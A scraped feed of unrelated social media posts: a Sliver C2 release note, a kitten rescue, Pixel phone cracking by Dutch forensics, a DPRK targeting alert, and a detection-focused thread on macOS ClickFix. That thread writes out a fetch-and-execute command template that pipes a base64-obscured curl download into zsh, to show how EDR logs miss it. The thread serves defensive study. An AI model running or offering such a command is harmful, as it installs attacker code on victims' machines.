Latest version of Sliver:
- Execute (some) unmodified .cna scripts using a Go implementation of Sleep/Aggressor scripts.
- Improved rportfwd, portfwd, and socks5 support, RDP and other quirky protocols are much more reliable now.
https://t.co/8RC5a2bj2M
A construction crew in Barberton, Ohio, rescued an abandoned kitten on the worksite. And he joined the team.
They heard him meowing coming from their excavator.
Supervisor Chase Guello checked the skid plate on the Komatsu. A tiny kitten tumbled out.
They warmed her up, moved her into the office trailer, and named her Sue short for Komatsu. She’s now the official shop cat.
‼️ BREAKING: The Netherlands Forensic Institute has found a way to crack Google Pixel phones, though it did not say which OS the phone was running. There is a high chance they were using an OS like GrapheneOS, since all three suspects were using Google Pixel phones. Or perhaps they are just fans of Google products.
They have already cracked one of the suspects' phones — that of Swedish national Veronica K., a suspect in a triple murder — prosecutors told the high-security court at Schiphol today.
The phone held images of weapons and stacks of cash, plus chats investigators can now read. The Forensic Institute expects to crack the two co-defendants' Pixels too.
ClickFix on macOS has an interesting visibility gap that I don’t think gets enough attention. The command the victim pastes into the terminal may never show up in your execution logs…
Take a command like this:
curl -s $(echo "..." | openssl base64 -d -A) | zsh
What the victim pastes into Terminal and what ends up in your EDR execution logs can be two very different things.
The existing shell parses the command first. Builtins, command substitution and pipes are handled by the shell, while ESF execution telemetry mainly gives you the processes that are actually executed.
So instead of seeing the full ClickFix command, you will end up with something closer to:
1. openssl base64 -d -A
2. curl -s https://...
3. zsh …
And the most interesting thing is the final piped zsh execution
The downloaded script is passed to zsh through stdin. It is not part of the zsh command line, so the actual commands being executed can be completely absent from your normal process execution logs.
You may see the processes spawned afterwards, but not necessarily the script/command that caused them.
Something worth keeping in mind when investigating macOS ClickFix activity!!
Ten years a former senior Pentagon official told me what I thought was an apocryphal story: American spies had saved Steve Jobs, and by extension, Apple.
Tracking it down became a personal obsession and the starting point for my new book, Valley of Death. I'm thrilled to share the excerpt about Jobs and the CIA published today in the @WSJ.
https://t.co/bj8sczI75e
Ohhh, looks like AI can read and write faster than you. You're cooked, 8 year old child enrolled in Elementary school, AI is going to replace you
Might as well give up on reading and writing, the machine is better. Go work in the schlinkus fields
Suspected DPRK-nexus crypto-targeting activity against #defcon34 attendees using ClickOnce-based initial access consistent with recently observed nation-state tradecraft. If you posted on Social Media, you are a target.
A year ago I left my last company, not of my own volition. Fast forward a year and my contract is ending and I am being laid off at the end of the month. I've been a CISO, ran a MSSP, ran IR and CTI for a fortune 50 company. Supported the IC for 15 years in cyber. #opentowork